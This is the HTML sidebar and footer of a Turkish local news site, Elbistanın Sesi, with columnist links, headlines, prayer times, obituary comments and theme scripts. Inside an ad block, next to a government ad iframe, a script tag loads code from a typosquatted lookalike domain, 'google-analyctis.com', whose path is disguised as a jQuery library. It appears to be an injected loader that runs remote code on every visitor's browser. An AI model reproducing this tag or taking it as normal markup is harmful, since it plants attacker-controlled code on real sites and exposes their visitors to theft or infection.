              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/vahametin-acmazi-makale,6237.html" title="VAHAMETİN AÇMAZI" >VAHAMETİN AÇMAZI</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/egri-cetvel-ile-dogru-cizilmez-makale,6231.html" title="EĞRİ CET­VEL İLE DOĞRU ÇİZİLMEZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/egri-cetvel-ile-dogru-cizilmez-makale,6231.html" title="EĞRİ CET­VEL İLE DOĞRU ÇİZİLMEZ" >EĞRİ CET­VEL İLE DOĞRU ÇİZİLMEZ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/uc-maymun-mu-yoksa-erdem-ve-ahlak-mi-makale,6227.html" title="Üç Maymun mu? Yoksa Erdem ve Ahlak mı?" >Üç Maymun mu? Yoksa Erdem ve Ahlak mı?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kimdik-kim-olduk-kim-olacagiz-makale,6226.html" title="KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Recep-arkadaş.jpg" alt="Recep ÇİFTLİKLİ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/97/recep-ciftlikli" title="Recep ÇİFTLİKLİ">Recep ÇİFTLİKLİ</a></h4>
              <a href="http://www.elbistaninsesi.com/kimdik-kim-olduk-kim-olacagiz-makale,6226.html" title="KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!" >KİMDİK ? KİM OLDUK! KİM OLACAĞIZ!!!</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/d985fcce-69b5-47bf-99fe-3c82dc92b125.jpg" alt="Akif DUT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/91/akif-dut" title="Akif DUT">Akif DUT</a></h4>
              <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >SOLAN TEBESSÜM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr_kaya.jpg" alt="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/87/dr-ogretim-uyesi-mustafa-emrah-kaya" title="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">Dr. Öğretim Üyesi / Mustafa Emrah Kaya</a></h4>
              <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >BİLİMSEL TIP ve BİZİMSEL TIP</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bozkirin-esmer-cocugu-makale,6201.html" title="Boz­kı­rın Esmer Ço­cu­ğu" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/IMG_20210216_033715.jpg" alt="Metehan Çağrı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/92/metehan-cagri" title="Metehan Çağrı">Metehan Çağrı</a></h4>
              <a href="http://www.elbistaninsesi.com/bozkirin-esmer-cocugu-makale,6201.html" title="Boz­kı­rın Esmer Ço­cu­ğu" >Boz­kı­rın Esmer Ço­cu­ğu</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >Benzer kaderin yolcuları: Filistin ve Doğu Türkistan</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >NELER OLOJİ </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >Zimem Defteri</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/elbistanda-82-bin-doz-asi-yapildi-h70610.html" title="Elbistan’da 82 bin doz aşı yapıldı" >Elbistan’da 82 bin doz aşı yapıldı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/besi-osbye-bolge-muduru-alinacak-h70602.html" title="Besi OSB’ye bölge müdürü alınacak" >Besi OSB’ye bölge müdürü alınacak</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/tasburundaki-pinar-suyuna-icilemez-raporu-h70435.html" title="Taşburun’daki pınar suyuna içilemez raporu" >Taşburun’daki pınar suyuna içilemez raporu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/tuvturkten-gecikme-zammi-aciklamasi-h70291.html" title="TÜVTÜRK’ten gecikme zammı açıklaması" >TÜVTÜRK’ten gecikme zammı açıklaması</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/mikrokredi-18yil-donumunu-kutluyor-h70268.html" title="Mikrokredi, 18.yıl dönümünü kutluyor" >Mikrokredi, 18.yıl dönümünü kutluyor</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>03:34</td>
            <td>05:17</td>
            <td>12:43</td>
            <td>16:35</td>
            <td>20:00</td>
            <td>21:35</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/gamze-nur-cetin-21-yasinda-h70633.html#comment_353457" title="" >Allah&#39;ım rahmet eylesin mekân ın...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-yenicerioglu-85-yasinda-h70588.html#comment_353452" title="" >Merhumeye Allahtan rahmet, Yeniçeri ve...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/kadir-kul-h70567.html#comment_353451" title="" >Allah rahmet eylesin. Allah evlatlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeynep-kirac-h70645.html#comment_353450" title="" >Merhumeye Allahtan rahmet dilerim.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/gamze-nur-cetin-21-yasinda-h70633.html#comment_353445" title="" >Merhumeye Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/rukiye-yildiz-66-yasinda-h70641.html#comment_353444" title="" >Merhumeye Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-sari-64-yasinda-h70644.html#comment_353443" title="" >Merhumeye Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeynep-kirac-h70645.html#comment_353442" title="" >Merhumeye Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-sari-64-yasinda-h70644.html#comment_353441" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeynep-kirac-h70645.html#comment_353440" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-sari-64-yasinda-h70644.html#comment_353439" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-sari-64-yasinda-h70644.html#comment_353438" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/rukiye-yildiz-66-yasinda-h70641.html#comment_353437" title="" >ALLAH RAHMET EYLESİN. AİLESİNİN VE YAKINLARININ...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-kurt-21-yasinda-h70600.html#comment_353436" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/birkan-yaman-27-yasinda-h70611.html#comment_353435" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hatice-kaplan-h70612.html#comment_353434" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/gamze-nur-cetin-21-yasinda-h70633.html#comment_353433" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/rukiye-yildiz-66-yasinda-h70641.html#comment_353432" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/rukiye-yildiz-66-yasinda-h70641.html#comment_353431" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hatice-kaplan-h70612.html#comment_353430" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
              </ul>
    </div>
  </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/12-Temmuz-2021.jpg" title="Elbistanın Sesi - 12.07.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_12-Temmuz-2021.jpg" alt="Elbistanın Sesi - 12.07.2021 Manşeti" /></a>
           </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" selected>17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" selected>Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="LGS’de başarılı olan öğrenciler ödüllendirildi" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a0c5ccc2c9d3d4c1cec9ced3c5d3c9c7c1dac5d4c5d3c9e0c7cdc1c9cc8ec3cfcd">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Flgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('70650', 'haber', '');
	
</script>

